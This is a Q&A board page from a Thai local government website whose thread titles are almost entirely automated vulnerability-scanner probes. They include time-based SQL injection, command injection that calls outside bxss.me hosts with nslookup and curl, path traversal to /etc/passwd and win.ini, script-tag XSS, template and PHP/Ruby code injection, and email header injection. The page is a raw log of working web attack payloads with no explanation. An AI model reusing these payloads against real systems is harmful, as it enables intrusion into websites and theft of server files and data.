:
ยินดีต้อนรับเข้าสู่ องค์การบริหารส่วนตำบลขี้เหล็ก ติดต่อสอบถาม : โทรศัพท์ : 043-039760 , 088-5577285 อีเมล์ : keelek.org@gmail.com , saraban@keelek-phatumrat.go.th

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
4
aiPxvpay 1 0
555 1 0
555 1 0
555 1 0
555 1 0
response.write(9758064*9707909) 1 0
'+response.write(9758064*9707909)+' 1 0
"+response.write(9758064*9707909)+" 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay response.write(9510668*9425097) 0
aiPxvpay '+response.write(9510668*9425097)+' 0
aiPxvpay "+response.write(9510668*9425097)+" 0
echo oueulz$()\ osjicx\nz^xyu||a #' &echo oueulz$()\ osjicx\nz^xyu||a #|" &echo oueulz$()\ osjicx\nz^xyu||a # 1 0
&echo tljlbi$()\ jyensr\nz^xyu||a #' &echo tljlbi$()\ jyensr\nz^xyu||a #|" &echo tljlbi$()\ jyensr\nz^xyu||a # 1 0
|echo hgclmj$()\ uzfwio\nz^xyu||a #' |echo hgclmj$()\ uzfwio\nz^xyu||a #|" |echo hgclmj$()\ uzfwio\nz^xyu||a # 1 0
aiPxvpay 1 0
(nslookup -q=cname hitegaiuquour95caf.bxss.me||curl hitegaiuquour95caf.bxss.me)) 1 0
$(nslookup -q=cname hitwebzdukglae150a.bxss.me||curl hitwebzdukglae150a.bxss.me) 1 0
&nslookup -q=cname hitvsrxqgkzet4db99.bxss.me&'\"`0&nslookup -q=cname hitvsrxqgkzet4db99.bxss.me&`' 1 0
&(nslookup -q=cname hitugtkwlwlhrdf677.bxss.me||curl hitugtkwlwlhrdf677.bxss.me)&'\"`0&(nslookup -q=cname hitugtkwlwlhrdf677.bxss.me||curl hitugtkwlwlhrdf677.bxss.me)&`' 1 0
|(nslookup -q=cname hitamdiimjchd1047c.bxss.me||curl hitamdiimjchd1047c.bxss.me) 1 0
`(nslookup -q=cname hitmnvlybqzdce8fe8.bxss.me||curl hitmnvlybqzdce8fe8.bxss.me)` 1 0
;(nslookup -q=cname hitbrltxdaeds143a5.bxss.me||curl hitbrltxdaeds143a5.bxss.me)|(nslookup -q=cname hitbrltxdaeds143a5.bxss.me||curl hitbrltxdaeds143a5.bxss.me)&(nslookup -q=cname hitbrltxdaeds143a5.bxss.me||curl hitbrltxdaeds143a5.bxss.me) 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay echo qegjdb$()\ jnyfsx\nz^xyu||a #' &echo qegjdb$()\ jnyfsx\nz^xyu||a #|" &echo qegjdb$()\ jnyfsx\nz^xyu||a # 0
aiPxvpay &echo mmrgmn$()\ smfjbu\nz^xyu||a #' &echo mmrgmn$()\ smfjbu\nz^xyu||a #|" &echo mmrgmn$()\ smfjbu\nz^xyu||a # 0
aiPxvpay |echo dgmhyf$()\ baclyb\nz^xyu||a #' |echo dgmhyf$()\ baclyb\nz^xyu||a #|" |echo dgmhyf$()\ baclyb\nz^xyu||a # 0
CFDbkkTY 1 0
aiPxvpay 1 0
aiPxvpay y9OfkE9S 0
aiPxvpay 1 0
aiPxvpay 1 0
../../../../../../../../../../../../../../etc/passwd 1 0
../../../../../../../../../../../../../../windows/win.ini 1 0
file:///etc/passwd 1 0
aiPxvpay 1 0
../aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay ../../../../../../../../../../../../../../etc/passwd 0
aiPxvpay ../../../../../../../../../../../../../../windows/win.ini 0
aiPxvpay file:///etc/passwd 0
aiPxvpay 1 0
aiPxvpay ../1 0
aiPxvpay%0abcc:009247.90-32683.90.8be36.19433.2@bxss.me 1 0
to@example.com>%0d%0abcc:009247.90-32684.90.8be36.19433.2@bxss.me 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1%0abcc:009247.90-32687.90.8be36.19433.2@bxss.me 0
aiPxvpay to@example.com>%0d%0abcc:009247.90-32688.90.8be36.19433.2@bxss.me 0
1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 0
aiPxvpay 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? 0
${9999371+10000273} 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1<esi:include src="http://bxss.me/rpb.png"/> 0
aiPxvpay ${9999209+9999377} 0
R1B6UnB0czk= 1 0
aiPxvpay&n923460=v979373 1 0
aiPxvpay 1 0
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 1 0
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 1 0
Http://bxss.me/t/fit.txt 1 0
http://bxss.me/t/fit.txt%3F.jpg 1 0
aiPxvpay 1&n961559=v987439 0
/etc/shells 1 0
c:/windows/win.ini 1 0
bxss.me 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
) 1 0
aiPxvpay 1 0
!(()&&!|*|*| 1 0
aiPxvpay 1 0
^(#$!@#$)(()))****** 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 0
aiPxvpay 1 0
aiPxvpay 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 0
aiPxvpay 1 0
aiPxvpay Http://bxss.me/t/fit.txt 0
aiPxvpay ) 0
aiPxvpay http://bxss.me/t/fit.txt%3F.jpg 0
aiPxvpay !(()&&!|*|*| 0
aiPxvpay ^(#$!@#$)(()))****** 0
aiPxvpay /etc/shells 0
aiPxvpay c:/windows/win.ini 0
aiPxvpay bxss.me 0
'.gethostbyname(lc('hitit'.'hcrxsdebb5973.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(80).chr(102).chr(88).' 1 0
'"() 1 0
".gethostbyname(lc("hitqh"."ihwjmkdo92649.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(90).chr(120).chr(66)." 1 0
aiPxvpay'&&sleep(27*1000)*qoiusb&&' 1 0
aiPxvpay 1 0
aiPxvpay"&&sleep(27*1000)*xltqmj&&" 1 0
aiPxvpay 1 0
aiPxvpay'||sleep(27*1000)*pagzjl||' 1 0
aiPxvpay '.gethostbyname(lc('hitkt'.'zokhiuwh0fd28.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(82).chr(122).chr(89).' 0
aiPxvpay"||sleep(27*1000)*uwrwub||" 1 0
aiPxvpay ".gethostbyname(lc("hittm"."isshylrab7704.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(83).chr(116).chr(89)." 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay '"() 0
aiPxvpay 1'&&sleep(27*1000)*zxonzh&&' 0
HttP://bxss.me/t/xss.html?%00 1 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 1 0
aiPxvpay 1"&&sleep(27*1000)*dstvjl&&" 0
bxss.me/t/xss.html?%00 1 0
';print(md5(31337));$a=' 1 0
aiPxvpay 1 0
aiPxvpay 1'||sleep(27*1000)*plmjbq||' 0
";print(md5(31337));$a=" 1 0
aiPxvpay 1 0
aiPxvpay 1"||sleep(27*1000)*oqcint||" 0
${@print(md5(31337))} 1 0
aiPxvpay HttP://bxss.me/t/xss.html?%00 0
${@print(md5(31337))}\ 1 0
aiPxvpay bxss.me/t/xss.html?%00 0
'.print(md5(31337)).' 1 0
"+"A".concat(70-3).concat(22*4).concat(98).concat(86).concat(120).concat(79)+(require"socket" Socket.gethostbyname("hitpy"+"jkpgislq4cc09.bxss.me.")[3].to_s)+" 1 0
aiPxvpay 1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 0
'+'A'.concat(70-3).concat(22*4).concat(105).concat(76).concat(98).concat(85)+(require'socket' Socket.gethostbyname('hitie'+'jfbdrqps7dfc3.bxss.me.')[3].to_s)+' 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
aiPxvpay 1 0
aiPxvpay "+"A".concat(70-3).concat(22*4).concat(110).concat(86).concat(97).concat(81)+(require"socket" Socket.gethostbyname("hitmm"+"ywzzwtfu0ca8e.bxss.me.")[3].to_s)+" 0
aiPxvpay 1 0
xfs.bxss.me 1 0
aiPxvpay '+'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(118).concat(68)+(require'socket' Socket.gethostbyname('hitsi'+'bbixsulcf37a3.bxss.me.')[3].to_s)+' 0
aiPxvpay ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
aiPxvpay 1 0
aiPxvpay xfs.bxss.me 0
aiPxvpay ';print(md5(31337));$a=' 0
aiPxvpay ";print(md5(31337));$a=" 0
'" 1 0
aiPxvpay ${@print(md5(31337))} 0
<!-- 1 0
aiPxvpay ${@print(md5(31337))}\ 0
aiPxvpay 1 0
aiPxvpay '.print(md5(31337)).' 0
aiPxvpay 1 0
aiPxvpay '" 0
aiPxvpay <!-- 0
1CPhIpsxgIO 0
0
1l2TteBp8O 0
response.write(9747170*9245438) 0
'+response.write(9747170*9245438)+' 0
"+response.write(9747170*9245438)+" 0
0
0
0
response.write(9837541*9853790) 0
'+response.write(9837541*9853790)+' 0
"+response.write(9837541*9853790)+" 0
aiPxvpay'"()&%<zzz><ScRiPt >68gX(9620)</ScRiPt> 1 0
'"()&%<zzz><ScRiPt >68gX(9840)</ScRiPt> 1 0
echo lekgcd$()\ gjqwap\nz^xyu||a #' &echo lekgcd$()\ gjqwap\nz^xyu||a #|" &echo lekgcd$()\ gjqwap\nz^xyu||a # 0
&echo txnxwa$()\ jqlipz\nz^xyu||a #' &echo txnxwa$()\ jqlipz\nz^xyu||a #|" &echo txnxwa$()\ jqlipz\nz^xyu||a # 0
|echo dhgxce$()\ unfqxo\nz^xyu||a #' |echo dhgxce$()\ unfqxo\nz^xyu||a #|" |echo dhgxce$()\ unfqxo\nz^xyu||a # 0
0
(nslookup -q=cname hitisgmznhkax52bd3.bxss.me||curl hitisgmznhkax52bd3.bxss.me)) 0
aiPxvpay9795825 1 0
$(nslookup -q=cname hitvoveharaue8ea7b.bxss.me||curl hitvoveharaue8ea7b.bxss.me) 0
&nslookup -q=cname hitlapkrbyhbod488d.bxss.me&'\"`0&nslookup -q=cname hitlapkrbyhbod488d.bxss.me&`' 0
&(nslookup -q=cname hitxnywknwwvl2063d.bxss.me||curl hitxnywknwwvl2063d.bxss.me)&'\"`0&(nslookup -q=cname hitxnywknwwvl2063d.bxss.me||curl hitxnywknwwvl2063d.bxss.me)&`' 0
|(nslookup -q=cname hitxmcukxooia7b54d.bxss.me||curl hitxmcukxooia7b54d.bxss.me) 0
bfg8508%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8508 1 0
`(nslookup -q=cname hitclzaomrwvz47b19.bxss.me||curl hitclzaomrwvz47b19.bxss.me)` 0
;(nslookup -q=cname hitmtqmtelmjscca58.bxss.me||curl hitmtqmtelmjscca58.bxss.me)|(nslookup -q=cname hitmtqmtelmjscca58.bxss.me||curl hitmtqmtelmjscca58.bxss.me)&(nslookup -q=cname hitmtqmtelmjscca58.bxss.me||curl hitmtqmtelmjscca58.bxss.me) 0
0
bfgx4991%C0%BEz1%C0%BCz2a%90bcxhjl4991 1 0
0
0
0
<%={{={@{#{${dfb}}%> 1 0
0
0
0
0
<th:t="${dfb}#foreach 1 0
0
UISkMdvn 0
0
0
echo afsclw$()\ fumuis\nz^xyu||a #' &echo afsclw$()\ fumuis\nz^xyu||a #|" &echo afsclw$()\ fumuis\nz^xyu||a # 0
fruTweK7 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 1 0
&echo serpjz$()\ dtdfss\nz^xyu||a #' &echo serpjz$()\ dtdfss\nz^xyu||a #|" &echo serpjz$()\ dtdfss\nz^xyu||a # 0
|echo wvqdmt$()\ nthqsz\nz^xyu||a #' |echo wvqdmt$()\ nthqsz\nz^xyu||a #|" |echo wvqdmt$()\ nthqsz\nz^xyu||a # 0
(nslookup -q=cname hitcwptkdxaywcc36c.bxss.me||curl hitcwptkdxaywcc36c.bxss.me)) 0
$(nslookup -q=cname hitnsjlwekpfiecbc9.bxss.me||curl hitnsjlwekpfiecbc9.bxss.me) 0
0
dfb{{98991*97996}}xca 1 0
&nslookup -q=cname hitwqcvmimbyv27036.bxss.me&'\"`0&nslookup -q=cname hitwqcvmimbyv27036.bxss.me&`' 0
&(nslookup -q=cname hiteiqajedrct9c1ce.bxss.me||curl hiteiqajedrct9c1ce.bxss.me)&'\"`0&(nslookup -q=cname hiteiqajedrct9c1ce.bxss.me||curl hiteiqajedrct9c1ce.bxss.me)&`' 0
|(nslookup -q=cname hitpmgiszqgxo9b4d9.bxss.me||curl hitpmgiszqgxo9b4d9.bxss.me) 0
../../../../../../../../../../../../../../etc/passwd 0
`(nslookup -q=cname hitrnadagpuyu54f45.bxss.me||curl hitrnadagpuyu54f45.bxss.me)` 0
../../../../../../../../../../../../../../windows/win.ini 0
dfb[[${98991*97996}]]xca 1 0
;(nslookup -q=cname hitgtcdetdgiq4239e.bxss.me||curl hitgtcdetdgiq4239e.bxss.me)|(nslookup -q=cname hitgtcdetdgiq4239e.bxss.me||curl hitgtcdetdgiq4239e.bxss.me)&(nslookup -q=cname hitgtcdetdgiq4239e.bxss.me||curl hitgtcdetdgiq4239e.bxss.me) 0
file:///etc/passwd 0
../../../../../../../../../../../../../../../proc/version 0
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 0
%0abcc:009247.90-32733.90.8be36.19433.2@bxss.me 0
../../../../../../../../../../etc/passwd%00.jpg 0
dfb__${98991*97996}__::.x 1 0
to@example.com>%0d%0abcc:009247.90-32734.90.8be36.19433.2@bxss.me 0
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 0
0
/../..//../..//../..//../..//../..//etc/passwd%00.jpg 0
0
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 1 0
%0abcc:009247.90-32737.90.8be36.19433.2@bxss.me 0
/etc/passwd 0
%2fetc%2fpasswd 0
to@example.com>%0d%0abcc:009247.90-32738.90.8be36.19433.2@bxss.me 0
/.././.././.././.././.././.././.././../etc/./passwd%00 0
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 0
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 0
aiPxvpay 1 0
../././../././../././../././../././../././../././../././../././../././etc/passwd 0
0
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? 0
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 0
0
aiPxvpay 1 0
file:///etc/passwd 0
0
/\../\../\../\../\../\../\../etc/passwd 0
0
/WEB-INF/web.xml 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? 0
aiPxvpay 1 0
<esi:include src="http://bxss.me/rpb.png"/> 0
0
<esi:include src="http://bxss.me/rpb.png"/> 0
aiPxvpay 1'"()&%<zzz><ScRiPt >68gX(9110)</ScRiPt> 0
${9999372+9999071} 0
0
${10000197+10000048} 0
aiPxvpay '"()&%<zzz><ScRiPt >68gX(9047)</ScRiPt> 0
aiPxvpay 19494719 0
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 0
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 0
aiPxvpay bfg9177%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9177 0
Http://bxss.me/t/fit.txt 0
http://bxss.me/t/fit.txt%3F.jpg 0
/etc/shells 0
c:/windows/win.ini 0
aiPxvpay bfgx5554%C0%BEz1%C0%BCz2a%90bcxhjl5554 0
0
0
aiPxvpay <%={{={@{#{${dfb}}%> 0
0
0
0
0
aiPxvpay <th:t="${dfb}#foreach 0
0
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 0
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 0
Http://bxss.me/t/fit.txt 0
aiPxvpay 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
http://bxss.me/t/fit.txt%3F.jpg 0
/etc/shells 0
c:/windows/win.ini 0
bxss.me 0
aiPxvpay dfb{{98991*97996}}xca 0
&n997950=v900278 0
aiPxvpay dfb[[${98991*97996}]]xca 0
0
aiPxvpay dfb__${98991*97996}__::.x 0
&n915047=v972191 0
aiPxvpay "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
aiPxvpay 1<ScRiPt >68gX(9479)</ScRiPt> 0
) 0
aiPxvpay 1<WPLFL7>RRFCZ[!+!]</WPLFL7> 0
!(()&&!|*|*| 0
^(#$!@#$)(()))****** 0
WEB-INF/web.xml 0
0
WEB-INF\web.xml 0
0
aiPxvpay 1<script>68gX(9719)</script> 0
0
0
0
) 0
0
!(()&&!|*|*| 0
0
0
0
0
0
'.gethostbyname(lc('hitzn'.'yqfruowr81a4d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(83).chr(120).chr(90).' 0
0
".gethostbyname(lc("hitjf"."arzuwkwgb15f3.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(74).chr(121).chr(69)." 0
0
0
0
'"() 0
0
'.gethostbyname(lc('hitbd'.'wsugvudi6bcc6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(72).chr(111).chr(81).' 0
'&&sleep(27*1000)*jqdsqi&&' 0
0
"&&sleep(27*1000)*wyecfa&&" 0
".gethostbyname(lc("hitki"."nnyecwte7c25b.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(79).chr(104).chr(78)." 0
0
'||sleep(27*1000)*syokuy||' 0
0
"||sleep(27*1000)*gfigdg||" 0
0
0
0
0
0
0
0
0
0
0
0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
'"() 0
0
';print(md5(31337));$a=' 0
'&&sleep(27*1000)*aagoqd&&' 0
0
"&&sleep(27*1000)*ozexgr&&" 0
0
../../../../../../../../../../../../../../etc/passwd 0
'||sleep(27*1000)*qqrarg||' 0
0
"||sleep(27*1000)*rqkcud||" 0
../../../../../../../../../../../../../../windows/win.ini 0
0
file:///etc/passwd 0
0
../../../../../../../../../../../../../../../proc/version 0
0
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 0
0
HttP://bxss.me/t/xss.html?%00 0
../../../../../../../../../../etc/passwd%00.jpg 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
bxss.me/t/xss.html?%00 0
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 0
';print(md5(31337));$a=' 0
0
/../..//../..//../..//../..//../..//etc/passwd%00.jpg 0
";print(md5(31337));$a=" 0
0
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 0
${@print(md5(31337))} 0
HttP://bxss.me/t/xss.html?%00 0
/etc/passwd 0
${@print(md5(31337))}\ 0
bxss.me/t/xss.html?%00 0
%2fetc%2fpasswd 0
'.print(md5(31337)).' 0
/.././.././.././.././.././.././.././../etc/./passwd%00 0
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
"+"A".concat(70-3).concat(22*4).concat(114).concat(82).concat(120).concat(68)+(require"socket" Socket.gethostbyname("hitou"+"hxezqhdk0c523.bxss.me.")[3].to_s)+" 0
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 0
0
'+'A'.concat(70-3).concat(22*4).concat(105).concat(81).concat(112).concat(90)+(require'socket' Socket.gethostbyname('hitqi'+'utbazkkv134fc.bxss.me.')[3].to_s)+' 0
../././../././../././../././../././../././../././../././../././../././etc/passwd 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
0
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 0
0
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 0
xfs.bxss.me 0
"+"A".concat(70-3).concat(22*4).concat(120).concat(75).concat(109).concat(76)+(require"socket" Socket.gethostbyname("hitpp"+"ywjjadxdc49bd.bxss.me.")[3].to_s)+" 0
file:///etc/passwd 0
0
'+'A'.concat(70-3).concat(22*4).concat(103).concat(77).concat(122).concat(69)+(require'socket' Socket.gethostbyname('hittg'+'xtuujrtg98ac9.bxss.me.')[3].to_s)+' 0
xfs.bxss.me 0
/\../\../\../\../\../\../\../etc/passwd 0
'" 0
0
<!-- 0
0
1'"()&%<zzz><ScRiPt >j6LL(9281)</ScRiPt> 0
0
'" 0
<!-- 0
'"()&%<zzz><ScRiPt >j6LL(9631)</ScRiPt> 0
19908488 0
bfg3404%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3404 0
bfgx10675%C0%BEz1%C0%BCz2a%90bcxhjl10675 0
<%={{={@{#{${dfb}}%> 0
<th:t="${dfb}#foreach 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
dfb{{98991*97996}}xca 0
dfb[[${98991*97996}]]xca 0
dfb__${98991*97996}__::.x 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1<ScRiPt >j6LL(9923)</ScRiPt> 0
1<WGCSDM>5O9F4[!+!]</WGCSDM> 0
1<script>j6LL(9911)</script> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%36%4C%4C%28%39%32%31%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<ScRiPt >j6LL(9027)</ScRiPt> 0
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9340></ScRiPt> 0
1<ScRiPt >j6LL(9631)</ScRiPt> 0
1<svg ?onload=j6LL(9435);> 0
1<isindex type=image src=1 onerror=j6LL(9598)> 0
0
0
0
1'"()&%<zzz><ScRiPt >j6LL(9504)</ScRiPt> 0
'"()&%<zzz><ScRiPt >j6LL(9231)</ScRiPt> 0
19975712 0
bfg1054%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1054 0
bfgx6884%C0%BEz1%C0%BCz2a%90bcxhjl6884 0
<%={{={@{#{${dfb}}%> 0
<th:t="${dfb}#foreach 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
dfb{{98991*97996}}xca 0
dfb[[${98991*97996}]]xca 0
dfb__${98991*97996}__::.x 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1<ScRiPt >j6LL(9877)</ScRiPt> 0
aiPxvpay 1 0
1<WMUC8T>2OW9N[!+!]</WMUC8T> 0
1<script>j6LL(9353)</script> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%36%4C%4C%28%39%38%34%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<ScRiPt >j6LL(9543)</ScRiPt> 0
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9914></ScRiPt> 0
1<ScRiPt >j6LL(9322)</ScRiPt> 0
1<svg ?onload=j6LL(9767);> 0
1<isindex type=image src=1 onerror=j6LL(9128)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9112'> 0
1<body onload=j6LL(9124)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=j6LL(9904)> 0
1<img src=xyz OnErRor=j6LL(9035)> 0
1<img/src=">" onerror=alert(9576)> 0
%31%3C%53%63%52%69%50%74%20%3E%6A%36%4C%4C%289741%29%3C%2F%73%43%72%69%70%54%3E 0
1\u003CScRiPt\j6LL(9066)\u003C/sCripT\u003E 0
aiPxvpay 1 0
FehjtgBT 1 0
-1 OR 2+400-400-1=0+0+0+1 -- 1 0
-1 OR 2+884-884-1=0+0+0+1 1 0
-1' OR 2+368-368-1=0+0+0+1 -- 1 0
-1' OR 2+890-890-1=0+0+0+1 or 'afUblz4n'=' 1 0
-1" OR 2+170-170-1=0+0+0+1 -- 1 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 1 0
1 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1 0
1 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1 0
ZJoiMo8Z 0
1 waitfor delay '0:0:15' -- 1 0
-1 OR 2+389-389-1=0+0+0+1 -- 0
-1 OR 2+319-319-1=0+0+0+1 0
-1' OR 2+324-324-1=0+0+0+1 -- 0
-1' OR 2+922-922-1=0+0+0+1 or '5h7sYiqo'=' 0
-1" OR 2+350-350-1=0+0+0+1 -- 0
Ne7HeLpZ'; waitfor delay '0:0:15' -- 1 0
WCRaiNCw' OR 745=(SELECT 745 FROM PG_SLEEP(15))-- 1 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
4zcZzvXN') OR 807=(SELECT 807 FROM PG_SLEEP(15))-- 1 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
hxUtOvAE')) OR 525=(SELECT 525 FROM PG_SLEEP(15))-- 1 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 1 0
1'" 1 0
1????%2527%2522 1 0
@@l9bcm 1 0
-1); waitfor delay '0:0:15' -- 0
aiPxvpay 1 0
1 waitfor delay '0:0:15' -- 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
-5 OR 791=(SELECT 791 FROM PG_SLEEP(15))-- 0
aiPxvpay 1 0
-5) OR 262=(SELECT 262 FROM PG_SLEEP(15))-- 0
aiPxvpay 1 0
-1)) OR 210=(SELECT 210 FROM PG_SLEEP(15))-- 0
aiPxvpay 1 0
0yVYqcJa' OR 370=(SELECT 370 FROM PG_SLEEP(15))-- 0
0
aiPxvpay 1 0
aiPxvpay 1 0
5vdfFPKs') OR 753=(SELECT 753 FROM PG_SLEEP(15))-- 0
LuE0Buss')) OR 538=(SELECT 538 FROM PG_SLEEP(15))-- 0
aiPxvpay 1 0
aiPxvpay 1 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1'" 0
1????%2527%2522 0
@@Tf4XI 0
aiPxvpay 1 0
0
aiPxvpay 1 0
0
0
0
0
0
0
0
aiPxvpay 1 0
0
aiPxvpay 1 0
aiPxvpay 1 0
0
aiPxvpay 1 0
aiPxvpay 1 0
0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
aiPxvpay 1 0
0
aiPxvpay 1 0
aiPxvpay 1 0
0
aiPxvpay lSVKmfHz 0
aiPxvpay -1 OR 2+205-205-1=0+0+0+1 -- 0
aiPxvpay -1 OR 2+407-407-1=0+0+0+1 0
aiPxvpay -1' OR 2+918-918-1=0+0+0+1 -- 0
aiPxvpay -1' OR 2+857-857-1=0+0+0+1 or 'KDg7R73w'=' 0
aiPxvpay -1" OR 2+964-964-1=0+0+0+1 -- 0
0
aiPxvpay if(now()=sysdate(),sleep(15),0) 0
0
aiPxvpay 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
0
aiPxvpay 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0
aiPxvpay (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0
0
aiPxvpay -1); waitfor delay '0:0:15' -- 0
aiPxvpay 1 waitfor delay '0:0:15' -- 0
0
0
0
aiPxvpay CMjRxjwY'; waitfor delay '0:0:15' -- 0
1 0
aiPxvpay -5 OR 295=(SELECT 295 FROM PG_SLEEP(15))-- 0
1 0
aiPxvpay -5) OR 404=(SELECT 404 FROM PG_SLEEP(15))-- 0
Z5cn5erk 0
-1 OR 2+348-348-1=0+0+0+1 -- 0
-1 OR 2+240-240-1=0+0+0+1 0
-1' OR 2+189-189-1=0+0+0+1 -- 0
-1' OR 2+484-484-1=0+0+0+1 or 'qBgHLgcP'=' 0
-1" OR 2+282-282-1=0+0+0+1 -- 0
aiPxvpay OVi3ALct' OR 709=(SELECT 709 FROM PG_SLEEP(15))-- 0
